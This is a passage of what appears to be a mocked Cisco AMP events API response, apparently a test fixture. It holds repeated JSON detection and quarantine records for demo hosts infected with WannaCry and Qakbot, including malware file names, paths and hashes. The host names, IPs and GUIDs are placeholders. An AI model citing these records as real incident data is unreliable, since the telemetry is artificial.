Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt 
Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
